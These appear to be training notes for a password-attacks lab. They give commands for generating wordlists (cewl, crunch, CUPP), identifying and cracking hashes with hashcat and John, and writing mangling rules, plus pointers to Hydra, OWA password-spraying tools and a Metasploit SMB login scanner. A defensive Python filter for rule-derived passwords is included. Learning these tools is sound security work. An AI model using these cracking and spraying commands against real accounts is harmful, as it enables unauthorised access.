Password Attacks
Lists of default passwords
Password Lists
Create custom lists
$ cewl -w list.txt -d 5 -m 5 http://company.com
-w will write the contents to a file. In this case, list.txt
-m 5 gathers strings (words) that are 5 characters or more
-d 5 is the depth level of web crawling/spidering (default 2)
Username Generator
$ git clone https://github.com/therodri2/username_generator.git
Keyspace Technique
$ crunch 2 2 01234abcd -o crunch.txt
Creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d
$ crunch 6 6 -t pass%%
Adds two numbers to the word "pass"
@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space
CUPP Interactive Mode:
$ git clone https://github.com/Mebus/cupp.git
$ cd cupp
$ python3 cupp.py -i
Identify hash:
$ hashid f806fc5a2a0d5ba2471600758452799c
$ hash-identifier f806fc5a2a0d5ba2471600758452799c
Crack Hashes offline:
$ hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt --show
-a 0 (Dictionary Attack)
-m 0 (MD5 hash)
$ hashcat -a 3 ?d?d?d?d --stdout
-a 3 (Brute-Force Attack)
?d?d?d?d (4 digits)
--stdout prints the generated candidates instead of comparing them against a hash
$ hashcat -a 3 -m 0 e48e13207341b6bffb7fb1622282247b ?d?d?d?d
Rule-Based Attacks with John:
$ john --wordlist=/tmp/list.txt --rules=best64 --stdout > /tmp/test.txt
--wordlist= to specify the wordlist or dictionary file
--rules to specify which rule or rules to use
--stdout to print the output to the terminal
$ cat /etc/john/john.conf | grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF
Prints all rules
Add custom rules to /etc/john/john.conf:
[List.Rules:THM-Password-Attacks]
Az"[0-9]" ^[!@#$]
Az"[0-9]" appends a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]" and so on.
^[!@#$] adds a special character at the beginning of each word. ^ means the beginning of the line/word. Note that changing ^ to $ will append the special characters to the end of the line/word.
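Seen from the defending side, the custom rule above describes a password shape that a password-change filter can reject. The following is an added example, not part of the original notes: it reverses the rule (strip one leading !@#$ and one trailing digit) and looks the remainder up in a word list. The function names, SITE_WORDS and PROPOSED are constructed for illustration.

```python
"""Password-filter check for the John rule shown on this page.

Rule:  Az"[0-9]" ^[!@#$]
       append one digit, then prepend one of ! @ # $
Result shape: <special><word><digit>
"""
PREFIXES = "!@#$"       # from ^[!@#$]
DIGITS = "0123456789"   # from Az"[0-9]"


def base_word(password):
    """Undo the rule; return the inner word, or None if the shape differs."""
    if len(password) < 3:
        return None  # no room for prefix + word + digit
    if password[0] in PREFIXES and password[-1] in DIGITS:
        return password[1:-1]
    return None


def is_rule_derivable(password, wordlist):
    """True if the password is <special><word><digit> for a listed word.

    The comparison is case-sensitive because the rule changes no letter case.
    """
    word = base_word(password)
    return word is not None and word in wordlist


def candidate_count(wordlist):
    """Number of candidates the rule produces from the word list."""
    return len(wordlist) * len(PREFIXES) * len(DIGITS)


def audit(passwords, wordlist):
    """Return the proposed passwords that the rule would reach."""
    return [p for p in passwords if is_rule_derivable(p, wordlist)]


# Constructed sample data: words a crawl of the company site might yield,
# and passwords submitted to a change-password form.
SITE_WORDS = {"company", "Welcome", "password"}
PROPOSED = ["!company7", "$Welcome1", "company7!", "#random9", "x7Kq-venture-Lamp"]

if __name__ == "__main__":
    print("candidates from rule:", candidate_count(SITE_WORDS))
    for rejected in audit(PROPOSED, SITE_WORDS):
        print("reject:", rejected)
```

Each base word yields only 40 candidates under this rule, so a password of this shape adds almost nothing over the bare word.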
Attack Services with Hydra
Outlook web access (OWA) portal tools
https://github.com/byt3bl33d3r/SprayingToolkit (atomizer.py)
https://github.com/dafthack/MailSniper
SMB tools
Metasploit (auxiliary/scanner/smb/smb_login)